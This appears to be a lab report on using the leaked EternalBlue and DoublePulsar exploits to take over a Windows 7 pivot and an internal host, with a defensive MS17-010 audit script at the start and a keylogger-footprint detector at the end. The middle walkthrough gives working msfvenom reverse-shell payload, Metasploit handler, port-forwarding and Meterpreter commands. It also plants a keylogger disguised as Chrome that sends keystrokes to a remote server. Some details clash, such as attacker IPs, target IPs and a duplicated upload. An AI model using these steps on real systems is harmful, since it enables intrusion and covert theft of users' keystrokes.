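Get-SmbListeners | ForEach-Object { Write-Output ("  " + $_.Line.Trim()) }

if (-not $patched) {
    Write-Warning "No MS17-010 KB found; check for a later cumulative rollup before concluding the host is unpatched."
}
if ($smb1 -ne 'Disabled') {
    if ($Remediate) {
        Disable-Smb1Server
        Write-Output "SMBv1 server disabled in the registry; reboot for the change to take effect."
    } else {
        Write-Warning "SMBv1 server is enabled. Re-run with -Remediate to disable it (reboot required)."
    }
}
```

Run it without arguments to get a report, and with -Remediate to turn the SMBv1 server off; the reboot requirement and the rollup caveat are the two things that most often trip up a quick "are we still exposed?" check.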
2 Setting up the practical scenario

Now we are going to look at the case study under consideration. First we will see how the network is built, which OS runs on each computer and how to install the secondary tools. Then the attack vector is described, that is, the steps taken to reach the goal, and finally the implementation of two keyloggers.

2.1 Environment setting

In our environment there are three computers:

• Kali Linux as the attack machine, running Fuzzbunch and the Metasploit framework. IP: 191.168.1.164

• Windows 7 64-bit as the pivot vulnerable host, with two adapters. IPs: 10.10.10.134 and 191.168.1.134

• Windows 7 64-bit as the target vulnerable host. IP: 10.10.10.175

The following picture gives a graphical representation of the network:

Kali Linux setting

On the Kali Linux machine we have to install two tools: Fuzzbunch and the Metasploit framework. One of the elements in the Shadow Brokers data dump is Fuzzbunch. Fuzzbunch can be compared to Metasploit, but it is written in Python instead of Ruby. It is an easy-to-use framework for the operator to launch exploits and interact with the implants. The Fuzzbunch framework contains several ready-to-use exploits, each for specific types of targets. Thanks to this guide [4] it is possible to install Fuzzbunch on Kali Linux. The Metasploit framework is already installed.

Windows 7 64-bit setting

On the Windows 7 computers it is not necessary to install anything.

2.2 Attack vector

The implemented attack vector is the following:

1. Take control of the pivot machine thanks to the EternalBlue and DoublePulsar attacks.

2. Upload the keylogger onto the pivot machine.

3. Through the pivot machine, take control of the target machine. This is done thanks to port forwarding and a proxy on the pivot machine.

4. Upload the keylogger onto the target machine.

The keylogger is made in such a way that it is placed into the browser folder and renamed with the browser's name; when the victim launches the browser, the keylogger starts first and then launches the actual browser. Every time the keylogger starts, it sends the log file to a remote server with an HTTP POST. Since doing an HTTP POST in C++ is difficult, I did it in four lines of Python and then transformed that into an executable file with a tool. Hence the keylogger calls this module to send the keystrokes to the server.

2.3 Keylogger: theory and implementation

Keylogging, often referred to as keyboard capturing or keystroke logging, is the action of recording or monitoring every key pressed on a keyboard [2]. There are several basic technologies which can be used to intercept keystrokes and mouse events, and many keyloggers use these technologies [3]. The main idea behind keyloggers is to get in between any two links in the chain of events between when a key is pressed and when information about that keystroke is displayed on the monitor. This can be achieved using video surveillance, a hardware bug in the keyboard, the wiring or the computer itself, intercepting input/output, substituting the keyboard driver or the filter driver in the keyboard stack, intercepting kernel functions by any means possible (substituting addresses in system tables, splicing function code, etc.), intercepting DLL functions in user mode, and, finally, requesting information from the keyboard using standard documented methods.
The most common methods used to construct keylogging software are the following:

• a system hook which intercepts the notification that a key has been pressed (installed using the WinAPI SetWindowsHook for messages sent by the window procedure; it is most often written in C). So for the first part we hook the keyboard input in order to capture it as well. Then the handlekeys function implements the keylogging logic, that is, it gets the keystrokes and saves them into the log file.

• a cyclical information request from the keyboard (using the WinAPI Get(Async)KeyState or GetKeyboardState; most often written in Visual Basic, sometimes in Borland Delphi). For this type of keylogger the main part is the following:

• using a filter driver (requires specialized knowledge and is written in C).
3 The practical case

Now we will see how the attack is implemented. First the first-hop attack is shown, then the more interesting one, that is, how to pivot through the first machine [6].

3.1 First hop

The target of this attack is the first computer, that is, the pivot machine.

3.1.1 Open Fuzzbunch and launch the EternalBlue attack

Open Fuzzbunch with this script:

    #!/bin/bash
    export WINEPREFIX=$HOME/.wine-fuzzbunch
    cd $HOME/.wine-fuzzbunch/drive_c/fuzzbunch-debian/windows
    wine cmd.exe

and then, at the cmd.exe prompt that opens:

    python fb.py
and set Default Target IP (the pivot's IP) and Default Callback IP Address (the attacker's IP) as follows:

Now we can use the EternalBlue attack module, so type:

    use eternalblue

Most of the settings are defaults, but be careful when it comes time to define the delivery mechanism. Be sure to select "Traditional deployment from within FUZZBUNCH" here:

At this point we are ready to run the exploit. If everything is set up correctly you should see WIN when the exploit is successful. It may take more than one try, but be persistent if you are sure the host is vulnerable:
3.1.2 Build the DLL to inject

Once the EternalBlue exploit is successful, the next step is to use the DoublePulsar module to inject a DLL of our choosing into a process on the victim. In this case we will run a DLL that contains a Meterpreter payload to establish a reverse shell back to our attacker machine. To generate the payload we will use msfvenom, and to make things easier we will generate it in the directory that Fuzzbunch is launched from:

    cd $HOME/.wine-fuzzbunch/drive_c/fuzzbunch-debian/windows
    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.164 lport=45467 --platform windows -f dll -o file.dll
3.1.3 Prepare the Metasploit framework

We also need to prepare Metasploit to receive the connection from the new victim once the DLL is injected, using exploit/multi/handler and making sure the payload, LPORT and LHOST match our msfvenom command from the previous step. The commands are:

    msfconsole
    use exploit/multi/handler
    set payload windows/x64/meterpreter/reverse_tcp
    set LHOST 192.168.1.164
    set LPORT 45467
    run

and in the end we will have:

3.1.4 Run the DoublePulsar attack

The next step is to run DoublePulsar and inject the malicious launcher.dll file. Type the following command in Fuzzbunch to use DoublePulsar:

    use doublepulsar

In our private practice lab we are targeting a 64-bit vulnerable Windows 7 installation. In this case we need to change the default setting for the architecture to 64-bit and keep all other variables at their defaults until we reach the Function settings.
Instead of the default option for the Function variable we choose to inject and run a DLL. You have probably guessed already that we are injecting the malicious DLL that we generated with msfvenom earlier. Choose option 2 from the Function settings. Then we need to enter the location of the DLL file; the other options we can leave at their defaults. Choose the default options for all other variable settings until Fuzzbunch asks whether we want to execute DoublePulsar. If all was successful the output should look like:

3.1.5 Wait and use Meterpreter

When we switch to the handler listener we should have a reverse shell from the pivot host, which we can now interact with:
3.2 Second hop

Once the pivot host's externally facing service is compromised and a Meterpreter shell is obtained, we want to reach the internal network in order to compromise other computers as well.

3.2.1 Set up pivoting

To reach our target we need to configure portfwd to relay traffic to internal hosts. The command in this case is:

    portfwd add -l 9000 -p 445 -r 10.10.10.183

The breakdown of the command is as follows:

• -l 9000: the port that will receive the traffic on the attacker host

• -p 445: the port on the internal victim that will be accessed

• -r 10.10.10.183: the internal victim, that is, our target

Once the portfwd is established, the attacker machine is listening on port 9000, and anything sent to that port will reach the internal victim on the defined destination port (445).

3.2.2 Open Fuzzbunch and launch the EternalBlue attack

As above, open Fuzzbunch with this script:

    #!/bin/bash
    export WINEPREFIX=$HOME/.wine-fuzzbunch
    cd $HOME/.wine-fuzzbunch/drive_c/fuzzbunch-debian/windows
    wine cmd.exe

and then, at the cmd.exe prompt that opens:

    python fb.py
and set Default Target IP and Default Callback IP Address (the attacker's IP) as before. This time the Default Target IP will be 127.0.0.1, because all traffic for the target passes through the attacker's localhost.
Now we can use the EternalBlue attack module, so type:

    use eternalblue

Most of the settings are defaults, but be careful when it comes time to define the target port. In this case we have to use the local port defined in the portfwd command, 9000, as EternalBlue defaults to 445. Hit enter at the "Prompt for Variable Settings" prompt to enter the new target port:

The next setting that deviates from the defaults is the delivery mechanism. Be sure to select "Traditional deployment from within FUZZBUNCH" here:
At this point we are ready to run the exploit. If everything is set up correctly you should see WIN when the exploit is successful. It may take more than one try, but be persistent if you are sure the host is vulnerable:
3.2.3 Build the DLL to inject

Once the EternalBlue exploit is successful, the next step is to use the DoublePulsar module to inject a DLL of our choosing into a process on the victim. In this case we will run a DLL that contains a Meterpreter payload to establish a reverse shell back to our attacker machine. To generate the payload we will use msfvenom, and to make things easier we will generate it in the directory that Fuzzbunch is launched from:

    cd $HOME/.wine-fuzzbunch/drive_c/fuzzbunch-debian/windows
    msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.164 lport=9000 --platform windows -f dll -o file2.dll

3.2.4 Prepare the Metasploit framework

We also need to prepare Metasploit to receive the connection from the new victim once the DLL is injected, using exploit/multi/handler. In this case the options (LPORT, LHOST) do not match the ones above, because the information flows from the target to the pivot and from the pivot to the attacker. Hence we have to use the port set in the portfwd command above. The commands are:

    msfconsole
    use exploit/multi/handler
    set payload windows/x64/meterpreter/reverse_tcp
    set LHOST 192.168.1.164
    set LPORT 9000
    run

and in the end we will have:

3.2.5 Run the DoublePulsar attack

Next, from Fuzzbunch run "use doublepulsar". Be sure that the target port matches (9000 in this case). Once configured, it should look something like this:
If all was successful the output should look like:

3.2.6 Wait and use Meterpreter

When we switch to the handler listener we should have a reverse shell from the target host, which we can now interact with:
3.3 Keylogger injection

To put the keylogger inside the machines we have to follow these commands. The goal is to upload the malicious files into the browser directory. One is the actual keylogger, the other is the send_data module. In the end we will have the actual browser renamed to browser_old.exe, while the malicious ones will be browser.exe and send_data.exe.

    shell
    cd "C:\Program Files (x86)\Google\Chrome\Application"
    rename chrome.exe chrome_old.exe
    upload /root/Desktop/send_data.exe "C:\Program Files (x86)\Google\Chrome\Application"
    upload /root/Desktop/send_data.exe "C:\Program Files (x86)\Google\Chrome\Application"

Now we have to wait for the user to open the browser, so that the keylogger sends its statistics to the server.

4 Conclusions

We have seen how Fuzzbunch with EternalBlue and DoublePulsar is a strong and powerful exploitation framework. Furthermore, we have seen how to perform pivoting with these tools. As we can see, it is easy to get into a computer that has this vulnerability, and from there into the internal network. This bug was patched, but today 4 million public IPs are still vulnerable, so they can be attacked. Moreover, if an attacker is able to get into a company computer with other techniques (such as phishing, etc.), and if the corporate internal network cannot update its internal PCs, the malicious person can get in with the technique seen above.
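The persistence trick in section 3.3 leaves a very specific footprint: the vendor's signed browser binary is renamed, an unsigned look-alike takes its name, and an extra executable (send_data.exe) appears in the same directory. The following PowerShell script is an added example written for this page, not code from the report; it checks a browser install directory for exactly that footprint. It assumes the Chrome path used in the report, PowerShell 3 or later, and an elevated prompt so every file is readable; Get-AuthenticodeSignature is what separates the real vendor binary from a replacement.

```powershell
# Added example (not from the report): look for the renamed-browser keylogger
# footprint from section 3.3 in a browser install directory.
# Assumptions: Chrome path as used in the report; PowerShell 3+; run as Administrator.

param(
    [string]$AppDir = 'C:\Program Files (x86)\Google\Chrome\Application',
    [string]$Binary = 'chrome.exe'
)

function Get-BrowserDirFindings {
    param([string]$Dir, [string]$Exe)
    $findings = @()
    $main = Join-Path $Dir $Exe
    if (-not (Test-Path $main)) { return @("main binary $main not found") }

    # 1. The genuine browser binary carries a valid vendor Authenticode signature;
    #    a freshly built executable renamed to chrome.exe does not.
    $sig = Get-AuthenticodeSignature -FilePath $main
    if ($sig.Status -ne 'Valid') {
        $findings += "$Exe signature status is $($sig.Status) (expected Valid)"
    } else {
        $findings += "info: $Exe signed by $($sig.SignerCertificate.Subject)"
    }

    # 2. Every other .exe in the directory is worth a look: the report renames the
    #    real browser to chrome_old.exe and drops send_data.exe next to it.
    $others = Get-ChildItem -Path $Dir -Filter '*.exe' |
              Where-Object { -not $_.PSIsContainer -and $_.Name -ne $Exe }
    foreach ($f in $others) {
        $s = Get-AuthenticodeSignature -FilePath $f.FullName
        $findings += "unexpected executable $($f.Name) (signature: $($s.Status), created $($f.CreationTime))"
    }

    # 3. A signed binary that is NOT named like the browser but IS signed by the
    #    browser vendor is the renamed original; report it explicitly.
    foreach ($f in $others) {
        $s = Get-AuthenticodeSignature -FilePath $f.FullName
        if ($s.Status -eq 'Valid' -and $s.SignerCertificate.Subject -eq $sig.SignerCertificate.Subject) {
            $findings += "$($f.Name) is signed by the same vendor as $Exe: possible renamed original"
        }
    }
    return $findings
}

$result = Get-BrowserDirFindings -Dir $AppDir -Exe $Binary
$problems = $result | Where-Object { $_ -notlike 'info:*' }
if ($problems.Count -eq 0) {
    Write-Output "No findings in $AppDir"
} else {
    Write-Output "Findings in ${AppDir}:"
    $result | ForEach-Object { Write-Output "  - $_" }
}
```

The signature check is the load-bearing part: a renamed keylogger cannot carry the vendor's signature, so "Status: NotSigned" on chrome.exe is a strong signal even before the extra executables are considered. The same logic applies to any other browser directory by changing the two parameters.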
References

[1] Rebekah Brown. The Shadow Brokers Leaked Exploits Explained. Ed. by Rapid7. URL: https://blog.rapid7.com/2017/04/18/the-shadow-brokers-leaked-exploits-faq/ (visited on 2017).

[2] Nikolay Grebennikov. Keyloggers: How they work and how to detect them. Ed. by AO Kaspersky Lab. URL: https://securelist.com/analysis/publications/36138/keyloggers-how-they-work-and-how-to-detect-them-part-1/ (visited on 2007).

[3] Nikolay Grebennikov. Keyloggers: Implementing keyloggers in Windows. Part Two. Ed. by AO Kaspersky Lab. URL: https://securelist.com/analysis/publications/36358/keyloggers-implementing-keyloggers-in-windows-part-two/ (visited on 2011).

[4] mdiazcl. Kali/fuzzbunch-debian deployment guide. URL: https://github.com/mdiazcl/fuzzbunch-debian (visited on 2017).

[5] Microsoft. Microsoft Security Bulletin MS17-010 - Critical. Ed. by Microsoft. URL: https://technet.microsoft.com/en-us/library/security/ms17-010.aspx (visited on 2017).

[6] Joe Norton. Running Fuzzbunch on Kali Through a Meterpreter Port Forward. URL: https://medium.com/@joe_norton/running-eternalblue-on-kali-through-a-meterpreter-port-forward-edd877dfd724 (visited on 2017).

[7] Jon Hart, Dustin Myers, Vasudha Shivamoggi, Philip Thomsen, Rebekah Brown, Bob Rudis. 2017 Q2 Rapid7 Quarterly Threat Report. Ed. by Rapid7. URL: https://information.rapid7.com/rs/411-NAK-970/images/rapid7-2017Q2-threat-report.pdf (visited on 2017).

[8] Tom Reeve. WannaCry not first to exploit NSA EternalBlue, DoublePulsar malware. Ed. by SC Magazine UK. URL: https://www.scmagazineuk.com/wannacry-not-first-to-exploit-nsa-eternalblue-doublepulsar-malware/article/661887/ (visited on 2017).

[9] boB Rudis. Wanna Decryptor (WNCRY) Ransomware Explained. Ed. by Rapid7. URL: https://blog.rapid7.com/2017/05/12/wanna-decryptor-wncry-ransomware-explained/ (visited on 2017).

[10] The Guardian. Hacking group auctions 'cyber weapons' stolen from NSA. Ed. by The Guardian. URL: https://www.theguardian.com/technology/2016/aug/16/shadow-brokers-hack-auction-nsa-malware-equation-group (visited on 2016).

[11] theshadowbrokers. OH LORDY! Comey Wanna Cry Edition. Ed. by Steemit. URL: https://steemit.com/shadowbrokers/@theshadowbrokers/oh-lordy-comey-wanna-cry-edition (visited on 2017).